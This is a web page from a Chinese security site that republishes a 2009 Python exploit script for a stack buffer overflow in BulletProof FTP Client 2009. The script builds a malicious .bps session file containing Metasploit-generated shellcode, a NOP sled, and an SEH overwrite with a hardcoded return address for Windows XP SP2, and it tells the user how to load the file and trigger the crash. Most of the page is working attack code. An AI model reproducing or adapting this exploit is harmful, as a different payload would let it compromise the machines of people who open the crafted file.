首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
BulletProof FTP Client 2009 (.bps) Buffer Overflow Exploit (SEH)
来源:www.vfcocus.net 作者:His0k4 发布时间:2009-04-14  

#!/usr/bin/python
#[*] Bug :      BulletProof FTP Client 2009 (.bps) Buffer Overflow Exploit (SEH)
#[*] Credits :      Stack
#[*] Tested on :    Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings :    All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
#[*] Chi3arona houa :        Serra7 merra7,koulchi mderra7 :D
#[*] translate by Cyb3r-1st: esse7 embe7 embou :D

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x71"
"\x4f\xd8\x8d\x83\xeb\xfc\xe2\xf4\x8d\xa7\x9c\x8d\x71\x4f\x53\xc8"
"\x4d\xc4\xa4\x88\x09\x4e\x37\x06\x3e\x57\x53\xd2\x51\x4e\x33\xc4"
"\xfa\x7b\x53\x8c\x9f\x7e\x18\x14\xdd\xcb\x18\xf9\x76\x8e\x12\x80"
"\x70\x8d\x33\x79\x4a\x1b\xfc\x89\x04\xaa\x53\xd2\x55\x4e\x33\xeb"
"\xfa\x43\x93\x06\x2e\x53\xd9\x66\xfa\x53\x53\x8c\x9a\xc6\x84\xa9"
"\x75\x8c\xe9\x4d\x15\xc4\x98\xbd\xf4\x8f\xa0\x81\xfa\x0f\xd4\x06"
"\x01\x53\x75\x06\x19\x47\x33\x84\xfa\xcf\x68\x8d\x71\x4f\x53\xe5"
"\x4d\x10\xe9\x7b\x11\x19\x51\x75\xf2\x8f\xa3\xdd\x19\xbf\x52\x89"
"\x2e\x27\x40\x73\xfb\x41\x8f\x72\x96\x2c\xb9\xe1\x12\x4f\xd8\x8d")

header1=(
"\x54\x68\x69\x73\x20\x69\x73\x20\x61\x20\x42\x75\x6c\x6c\x65\x74"
"\x50\x72\x6f\x6f\x66\x20\x46\x54\x50\x20\x43\x6c\x69\x65\x6e\x74"
"\x20\x53\x65\x73\x73\x69\x6f\x6e\x2d\x46\x69\x6c\x65\x20\x61\x6e"
"\x64\x20\x73\x68\x6f\x75\x6c\x64\x20\x6e\x6f\x74\x20\x62\x65\x20"
"\x6d\x6f\x64\x69\x66\x69\x65\x64\x20\x64\x69\x72\x65\x63\x74\x6c"
"\x79\x2e\x0d\x0a")

exploit =  "passwords.hotmail.com"
exploit += "\x90"*68
exploit += "\x74\x06\x90\x90" #oplaa!
exploit += "\x98\x6A\xBF\x74" #oleacc.dll (xp sp2)
exploit += shellcode

header2=(
"\x0a\x32\x31\x0d\x0a\x41\x42\x41\x42\x43\x0d\x0a\x62\x70\x68\x67\x71"
"\x64\x6e\x62\x6a\x6a\x67\x61\x65\x62\x0d\x0a\x63\x3a\x5c\x0d\x0a"
"\x2f\x0d\x0a")

vuln = header1 + exploit + header2

try:
    out_file = open("sploit.bps",'w')
    out_file.write(vuln)
    out_file.close()
    print "\nSession file created!\n\nNow Go to: file>Load BP Session then chose it and clic Connect\n"
except:
    print "Error!"
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ftpdmin 0.96 Arbitrary File Di
·Steamcast (HTTP Request) Remot
·ASP Product Catalog 1.0 (XSS/D
·Steamcast (HTTP Request) Remot
·Mini-stream Ripper 3.0.1.1 .m3
·Mini-stream RM-MP3 Converter 3
·ASX to MP3 Converter 3.0.0.7 .
·RM Downloader 3.0.0.9 .m3u Uni
·ASX to MP3 Converter (.M3U Fil
·Shadow Stream Recorder (.m3u f
·OpenBSD 4.3/4.4/4.5 (IP datagr
·Easy RM to MP3 Converter Unive
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved